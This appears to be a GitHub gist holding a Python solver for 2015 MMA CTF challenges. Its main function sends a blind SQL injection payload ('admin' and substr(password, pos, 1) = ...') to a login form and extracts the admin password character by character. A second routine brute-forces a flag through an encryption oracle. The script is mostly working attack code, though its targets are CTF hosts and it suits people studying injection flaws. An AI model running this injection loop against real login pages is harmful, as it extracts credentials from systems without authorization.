@shunkp
Created September 6, 2015 23:52
from urllib.request import *
from urllib.parse import *
import string
# check admin password via sql injection + substr
# return True if we are able to login (ie. character is a match), False otherwise
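def challenge2(bURL, pos, char):
    """Return True when the login oracle accepts ``char`` at 1-based ``pos``.

    POSTs a ``username`` field that embeds a ``substr(password, pos, 1)``
    comparison to ``bURL`` and treats a response body of at most 36 bytes
    as "logged in" (threshold taken from the original script; it is the
    observed size of the success page, not derived here). The oracle only
    works because the server side interpolates the field into SQL — a
    parameterized query on the server removes the signal entirely.

    Args:
        bURL: login endpoint URL.
        pos: 1-based character position of the password to test.
        char: candidate character (inserted unescaped into the payload;
            the callers only pass alphanumerics, ``_`` and ``}``).

    Returns:
        True if the response body length is <= 36, False otherwise.

    Raises:
        urllib.error.URLError / HTTPError: propagated from ``urlopen``.
    """
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0',
        'Accept-Language': 'en-GB,en;q=0.5',
    }
    values = {'username': 'admin\' and substr(password, {0}, 1) = \'{1}\'; - --'.format(pos, char)}
    data = urlencode(values).encode('utf-8')
    req = Request(bURL, data=data, headers=headers)
    # Close the response on every probe; the original leaked the connection
    # each call, which matters for a loop that issues hundreds of requests.
    with urlopen(req) as resp:
        body = resp.read().decode('utf-8')
    return len(body) <= 36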
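def admin(bURL="http://arrive.chal.mmactf.link/login.cgi", start="MMA{"):
    """Recover the admin password one character at a time via ``challenge2``.

    Extends ``start`` with each character the oracle accepts and stops once
    the closing ``}`` is appended, or when no candidate is accepted for the
    next position. The original loop tested ``flag`` but never set it, so it
    never terminated; it also re-probed the same position forever when no
    candidate matched.

    Args:
        bURL: login endpoint probed by ``challenge2`` (was hard-coded).
        start: known prefix; probing begins at the position after it.

    Returns:
        The recovered string, including ``}`` when it was found.
    """
    # string.printable would also work; this set was sufficient in practice.
    alphabet = string.ascii_lowercase + string.ascii_uppercase + '0123456789_}'
    found = start
    pos = len(found) + 1
    print('Starting string: {0}'.format(found))
    while True:
        for c in alphabet:
            if challenge2(bURL, pos, c):
                found += c
                pos += 1
                print('Letter found: {0}\nString: {1}\n'.format(c, found))
                break
        else:
            # No candidate accepted at this position: stop instead of looping.
            print('No match at position {0}; stopping'.format(pos))
            return found
        if found.endswith('}'):
            return found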
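def challenge(bURL, text):
    """POST ``text`` to the encryption form at ``bURL`` and return its output.

    The form field ``s`` carries the text and ``.submit`` carries the button
    label (Japanese for "encrypt"). The result is the text between the first
    ``</h1>`` and the next ``<``, minus its last character (the original strips
    one trailing character — presumably a newline; not verified here).

    Args:
        bURL: form endpoint URL.
        text: plaintext to submit.

    Returns:
        The extracted output string.

    Raises:
        ValueError: if the response does not contain the expected markup
            (the body is printed first to aid debugging). The original used
            a bare ``except`` here and then fell through to an unbound name.
        urllib.error.URLError / HTTPError: propagated from ``urlopen``.
    """
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0',
        'Accept-Language': 'en-GB,en;q=0.5',
    }
    values = {'s': text.encode('utf-8'), '.submit': '暗号化'}
    data = urlencode(values).encode('utf-8')
    req = Request(bURL, data=data, headers=headers)
    # Close the response; the original left it open on every call.
    with urlopen(req) as resp:
        body = resp.read().decode('utf-8')
    try:
        return body.split("</h1>")[1].split("<")[0][:-1]
    except IndexError as err:
        print(body)
        raise ValueError('unexpected response layout from {0}'.format(bURL)) from err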
def scs3(match, prefix=""):
    """Extend ``prefix`` character by character until the oracle output equals ``match``.

    ``match`` is the target output (space-separated tokens, apparently hex
    bytes judging by the commented example in ``__main__``). For each
    candidate character, the oracle's output for ``prefix + c`` is split on
    spaces and compared token-wise with ``match`` from index 2 onward; the
    candidate is accepted when the comparison runs past the end of the
    response (``IndexError``), and rejected at the first differing token.

    NOTE(review): if the token loop finishes with neither a mismatch nor an
    ``IndexError``, ``i`` is not advanced and the same candidate is re-sent
    forever. Whether that state is reachable depends on the oracle — verify.
    """
    printable = string.ascii_lowercase + '0123456789}'
    smatch = match.split(" ")
    # This first call's result is overwritten before use; it only warms up the oracle (if anything).
    resp = challenge("http://bow.chal.mmactf.link/~scs/crypt6.cgi", prefix)
    print("Starting string: {0}".format(prefix))
    i = 0
    while i < len(printable):
        resp = challenge("http://bow.chal.mmactf.link/~scs/crypt6.cgi", prefix + printable[i])
        if match != resp:
            sresp = resp.split(" ")
            try:
                # Tokens 0 and 1 are skipped — presumably a fixed header; confirm against the oracle.
                for x in range(2,len(smatch)):
                    if smatch[x] != sresp[x]:
                        i += 1
                        break
            except IndexError:
                # Response shorter than the target: treat the candidate as correct and restart the scan.
                prefix += printable[i]
                print("New character found {0}\nString: {1}\n".format(printable[i],prefix))
                i = 0
        else:
            print("Match found: {0}\n".format(prefix + printable[i]))
            break
if __name__ == "__main__":
    # Only the login-oracle recovery runs by default; the scs3 invocation below
    # is kept as a worked example of its expected ``match`` format.
    #scs3("60 00 0c 3a 1e 52 02 53 02 51 0c 5d 56 51 5a 5f 5f 5a 51 00 05 53 56 0a 5e 00 52 05 03 51 50 55 03 04 52 04 0f 0f 54 52 57 03 52 04 4e","MMA{e7")
    admin()